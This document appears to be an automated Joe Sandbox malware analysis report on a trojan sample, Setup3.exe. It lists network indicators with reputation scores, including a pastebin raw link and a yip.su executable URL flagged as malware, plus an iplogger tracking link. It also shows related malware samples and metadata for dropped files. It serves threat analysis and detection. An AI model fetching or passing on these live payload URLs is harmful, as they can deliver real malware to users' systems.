                https://pastebin.com4h0%Avira URL Cloudsafe
                https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
                http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%Avira URL Cloudsafe
                http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%Avira URL Cloudsafe
                https://iplogger.com/1djqU40%Avira URL Cloudsafe
                https://yip.suh0%Avira URL Cloudsafe
                https://yip.su0%Avira URL Cloudsafe
                http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%VirustotalBrowse
                https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
                http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%VirustotalBrowse
                http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%Avira URL Cloudsafe
                https://iplogger.com/1djqU42%VirustotalBrowse
                http://yip.su0%Avira URL Cloudsafe
                https://pastebin.com0%Avira URL Cloudsafe
                https://iplogger.comh0%Avira URL Cloudsafe
                https://pastebin.com/raw/V6VJsrV3100%Avira URL Cloudmalware
                https://yip.su/RNWPd.exe100%Avira URL Cloudmalware
                http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%VirustotalBrowse
                https://pastebin.comh0%Avira URL Cloudsafe
                https://pastebin.com/raw/V6VJsrV37%VirustotalBrowse
                https://pastebin.com0%VirustotalBrowse
                https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU40%Avira URL Cloudsafe
                https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
                http://yip.su7%VirustotalBrowse
                http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%Avira URL Cloudsafe
                https://yip.su7%VirustotalBrowse
                https://yip.su/RNWPd.exe16%VirustotalBrowse
                https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU40%VirustotalBrowse
                https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
                http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                yip.su
                188.114.96.3
                truefalseunknown
                pastebin.com
                104.20.4.235
                truetrueunknown
                iplogger.com
                104.21.76.57
                truefalseunknown
                NameMaliciousAntivirus DetectionReputation
                https://iplogger.com/1djqU4false
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://pastebin.com/raw/V6VJsrV3false
                • 7%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                https://yip.su/RNWPd.exetrue
                • 16%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://www.cloudflare.com/learning/access-management/phishing-attack/jsc.exe, 00000008.00000002.4477652270.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0Setup3.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://sectigo.com/CPS0Setup3.exefalse
                • URL Reputation: safe
                unknown
                http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#Setup3.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://pastebin.com4hjsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://ocsp.sectigo.com0Setup3.exefalse
                • URL Reputation: safe
                unknown
                https://yip.suhjsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://yip.sujsc.exe, 00000008.00000002.4477652270.0000000002969000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmptrue
                • 7%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSetup3.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://yip.sujsc.exe, 00000008.00000002.4477652270.0000000002969000.00000004.00000800.00020000.00000000.sdmptrue
                • 7%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://upx.sf.netAmcache.hve.12.drfalse
                • URL Reputation: safe
                unknown
                https://iplogger.comhjsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejsc.exe, 00000008.00000002.4477652270.0000000002791000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://pastebin.comjsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://pastebin.comhjsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4Setup3.exe, 00000000.00000002.2234066396.000001AAD4C3E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4476131573.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.cloudflare.com/5xx-error-landingjsc.exe, 00000008.00000002.4477652270.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Setup3.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                104.20.4.235
                pastebin.comUnited States
                13335CLOUDFLARENETUStrue
                188.114.96.3
                yip.suEuropean Union
                13335CLOUDFLARENETUSfalse
                172.67.188.178
                unknownUnited States
                13335CLOUDFLARENETUSfalse
                104.21.76.57
                iplogger.comUnited States
                13335CLOUDFLARENETUSfalse
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1494267
                Start date and time:2024-08-18 00:07:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 18s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Setup3.exe
                Detection:MAL
                Classification:mal100.troj.expl.evad.winEXE@17/10@4/4
                EGA Information:
                • Successful, ratio: 50%
                HCA Information:
                • Successful, ratio: 82%
                • Number of executed functions: 24
                • Number of non-executed functions: 1
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.168.117.173
                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target jsc.exe, PID 7248 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                18:08:02API Interceptor23x Sleep call for process: powershell.exe modified
                18:08:04API Interceptor11195218x Sleep call for process: jsc.exe modified
                18:08:19API Interceptor1x Sleep call for process: WerFault.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
                • pastebin.com/raw/V9y5Q5vv
                New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                • pastebin.com/raw/NsQ5qTHr
                Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                • pastebin.com/raw/NsQ5qTHr
                Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                • pastebin.com/raw/NsQ5qTHr
                Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                • pastebin.com/raw/NsQ5qTHr
                Update on Payment.jsGet hashmaliciousWSHRATBrowse
                • pastebin.com/raw/NsQ5qTHr
                188.114.96.3Injector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 753139cl.nyashtop.top/PythonPhpPollProtectTrackcdnUploadsDownloads.php
                set-up.exeGet hashmaliciousCryptbotBrowse
                • neintyy19sb.top/v1/upload.php
                set-up.exeGet hashmaliciousCryptbotBrowse
                • neintyy19sb.top/v1/upload.php
                rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.xlsGet hashmaliciousUnknownBrowse
                • jiourl.com/anbdld
                QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • filetransfer.io/data-package/9sUie4yY/download
                PRODUCTS SHEET 0051937.exeGet hashmaliciousFormBookBrowse
                • www.ediancai.cn/x7r2/
                RFQ-180624.exeGet hashmaliciousFormBookBrowse
                • www.ediancai.cn/x7r2/
                http://proph.co.ukGet hashmaliciousUnknownBrowse
                • proph.co.uk/blog/
                7092832738283792.exeGet hashmaliciousFormBookBrowse
                • www.coinwab.com/kqqj/
                g45zz6J4tL.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 376294cm.n9sh.top/JavascriptprocessorAuth.php
                172.67.188.178SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exeGet hashmaliciousDarkTortillaBrowse
                  file.exeGet hashmaliciousDarkTortillaBrowse
                    SecuriteInfo.com.Win32.TrojanX-gen.2935.18945.exeGet hashmaliciousAmadey, DarkTortilla, RedLine, XWormBrowse
                      yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                        Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                          SecuriteInfo.com.BackDoor.SpyBotNET.62.21177.12908.exeGet hashmaliciousEICAR, PureLog Stealer, zgRATBrowse
                            3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                              3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                1cEhV3HjIY.exeGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exeGet hashmaliciousPureLog StealerBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    yip.sufile.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousCryptbotBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousCryptbotBrowse
                                    • 188.114.97.3
                                    SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exeGet hashmaliciousDarkTortillaBrowse
                                    • 188.114.97.3
                                    284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousDarkTortillaBrowse
                                    • 188.114.96.3
                                    file.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                    • 188.114.97.3
                                    SecuriteInfo.com.Trojan.Inject5.6732.13710.8794.exeGet hashmaliciousCryptbot, NeoreklamiBrowse
                                    • 188.114.97.3
                                    pastebin.comfile.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.3.235
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    SecuriteInfo.com.Win64.Evo-gen.15723.9736.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.19.24
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    file.exeGet hashmaliciousCryptbotBrowse
                                    • 104.20.4.235
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.19.24
                                    file.exeGet hashmaliciousCryptbotBrowse
                                    • 172.67.19.24
                                    SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.3.235
                                    iplogger.comfile.exeGet hashmaliciousUnknownBrowse
                                    • 104.21.76.57
                                    SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exeGet hashmaliciousDarkTortillaBrowse
                                    • 172.67.188.178
                                    file.exeGet hashmaliciousDarkTortillaBrowse
                                    • 172.67.188.178
                                    yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                    • 172.67.188.178
                                    Arc453466701.msiGet hashmaliciousUnknownBrowse
                                    • 104.21.76.57
                                    Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                                    • 104.21.76.57
                                    Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                                    • 104.21.76.57
                                    Arch0000000000.msiGet hashmaliciousMetamorfoBrowse
                                    • 104.21.76.57
                                    3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.188.178
                                    3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                    • 104.21.76.57
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUSMonolith.exeGet hashmaliciousUnknownBrowse
                                    • 162.159.137.232
                                    GPUpdate.exeGet hashmaliciousLuna Stealer, Luna GrabberBrowse
                                    • 162.159.130.233
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    Unlocker.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 104.21.42.119
                                    https://static.jitbit.com/mr/MacroRecorderSetup.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    Apocalypse.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 172.67.158.159
                                    Injector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 188.114.96.3
                                    Apocalypse.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 104.21.16.74
                                    Cheat.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                    • 188.114.97.3
                                    CLOUDFLARENETUSMonolith.exeGet hashmaliciousUnknownBrowse
                                    • 162.159.137.232
                                    GPUpdate.exeGet hashmaliciousLuna Stealer, Luna GrabberBrowse
                                    • 162.159.130.233
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    Unlocker.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 104.21.42.119
                                    https://static.jitbit.com/mr/MacroRecorderSetup.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    Apocalypse.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 172.67.158.159
                                    Injector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 188.114.96.3
                                    Apocalypse.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 104.21.16.74
                                    Cheat.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                    • 188.114.97.3
                                    CLOUDFLARENETUSMonolith.exeGet hashmaliciousUnknownBrowse
                                    • 162.159.137.232
                                    GPUpdate.exeGet hashmaliciousLuna Stealer, Luna GrabberBrowse
                                    • 162.159.130.233
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    Unlocker.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 104.21.42.119
                                    https://static.jitbit.com/mr/MacroRecorderSetup.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    Apocalypse.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 172.67.158.159
                                    Injector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 188.114.96.3
                                    Apocalypse.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 104.21.16.74
                                    Cheat.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                    • 188.114.97.3
                                    CLOUDFLARENETUSMonolith.exeGet hashmaliciousUnknownBrowse
                                    • 162.159.137.232
                                    GPUpdate.exeGet hashmaliciousLuna Stealer, Luna GrabberBrowse
                                    • 162.159.130.233
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    Unlocker.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 104.21.42.119
                                    https://static.jitbit.com/mr/MacroRecorderSetup.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    Apocalypse.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 172.67.158.159
                                    Injector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 188.114.96.3
                                    Apocalypse.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                    • 104.21.16.74
                                    Cheat.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                    • 188.114.97.3
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    WWAHost.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    Cheat.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    apzzz-20c7e.kxcdn.com.ps1Get hashmaliciousLummaC, Go InjectorBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    DHL Receipt_4977049580.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    http://pub-244e972cad9242be820ac9530c22a242.r2.dev/%EA%B0%90%EC%82%AC%ED%95%A9%EB%8B%88%EB%8B%A4.htmlGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    https://gtm.you1.cn/profiles/76561198013673010Get hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    • 188.114.96.3
                                    • 104.21.76.57
                                    No context
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.1422841282848124
                                    Encrypted:false
                                    SSDEEP:192:8DQU2ysD0UnUlaWBUUpEibdzuiFpZ24lO86:yQU2yswUnUlamUcZzuiFpY4lO86
                                    MD5:36778D43A186FF425A7B3C9E2DAA92E1
                                    SHA1:FDA0A3B80BA8AA7E5B691CDE830BB3FA6A78A744
                                    SHA-256:0AB3E39E64273FB933AA9402DFB345A2F43214DFD8C797FA813C0CC67DCC9CFD
                                    SHA-512:1E07B1C523AA09531B19A43904FD6084F0A5537B35D62E94948F44712620003C184C312E7BA23F2E4C0E9C7C89DA5B3A14DF03E04D4F68667AABC0BE7CC847FD
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.4.0.6.0.8.3.7.2.3.9.2.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.4.0.6.0.8.4.7.5.5.1.7.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.a.2.7.d.4.6.-.f.2.6.5.-.4.f.6.9.-.8.f.0.0.-.0.f.d.f.e.1.7.c.3.0.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.e.7.0.c.6.3.-.e.5.0.a.-.4.9.6.0.-.9.8.b.b.-.1.8.0.7.b.5.3.a.a.3.0.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.S.e.t.u.p.3...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.o.l.y.a.y.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.e.8.-.0.0.0.1.-.0.0.1.4.-.c.e.e.1.-.1.1.e.b.f.1.f.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.7.1.1.2.a.4.9.a.e.e.1.6.b.8.0.3.a.8.e.7.5.f.8.c.b.7.3.f.7.c.b.0.0.0.0.0.0.0.0.!.0.0.0.0.7.3.2.9.0.3.4.7.8.9.2.d.4.2.6.1.e.3.b.0.3.7.2.0.2.b.a.4.2.a.b.d.3.5.8.9.5.d.2.7.!.S.e.t.u.p.3...e.x.e.....T.a.r.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Mini DuMP crash report, 16 streams, Sat Aug 17 22:08:04 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):460167
                                    Entropy (8bit):3.287625953136167
                                    Encrypted:false
                                    SSDEEP:3072:llGqzywHDL4ee2ocSAFuaSWUFYEjlc1CCqjk1kEfFy63+ve3Qr:llGqjjL8U7SZSPq8k763QFr
                                    MD5:F34ECB66BACC8B4434C4FB2A6F84AAF6
                                    SHA1:56C6D7DD0BE5CC8BF8D9F3C71B177D91BA0D6F3D
                                    SHA-256:804499D806FBAEF75E4784E1CF06C2F7E6DC1BBE7A54D2FCD4B39BEE855BBF46
                                    SHA-512:999D6A33054B6F01424B94287B6617F35AE78093A18043DF6EDB860BD8463CEAE7A3B5B1E2A32CFC900F65B234C93AD56A7F19CFC8E9B85C05A6D28F94D8912F
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... .......D..f............D...........p...d.......$....$...........$.......N..4...........l.......8...........T...........@9..G............C...........E..............................................................................eJ......8F......Lw......................T...........>..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8586
                                    Entropy (8bit):3.7069274479169487
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJD2Tr6YEIdy+20gmf943pra89b8+LfvUm:R6lXJyf6YEir20gmf9458KfZ
                                    MD5:DDC9AC2AB2DEDF6FCE41E7D925563C86
                                    SHA1:7059805548EF5E33153C1BBF92241AF1423EDA1E
                                    SHA-256:2262C339B6962184D9C0DAA5F42BB022520B5FF7EB0EBC6E78AA174DE40B79C5
                                    SHA-512:90DF17F05D252C64F7AB4AB6BC908EF5A3D605B687E481A046747B0AE5F7674BAB611732B3BCE8AFB2D6BD84267F7BF659B7D0D18486BB1BF134E0F6939F3F94
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.9.2.<./.P.i.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4740
                                    Entropy (8bit):4.496246347462411
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zssNJg771I9XEWpW8VYfYm8M4Jm54+Fayq85KhAihArUhTjUgd:uIjfsnI7Md7VPJTeihAYhkgd
                                    MD5:1AC8083F8A1DF3F3D95BB46626AF9256
                                    SHA1:D7577DD32DD9AA54B18C2950DECDF81ED2B49439
                                    SHA-256:FAEA07A96FA0C93CF17D6894529ECC84DABE1B3C9C3B689223021B52FBC3DB5A
                                    SHA-512:7DA6F2D23F747E786192523E1B02736E9D00DC8E1DA1D9F6D27511915AE344D81F01EBF818CEBA50A866E64119EEA3C18112C6BAA7611A7D13FDF7221198812D
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="460150" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1510207563435464
                                    Encrypted:false
                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
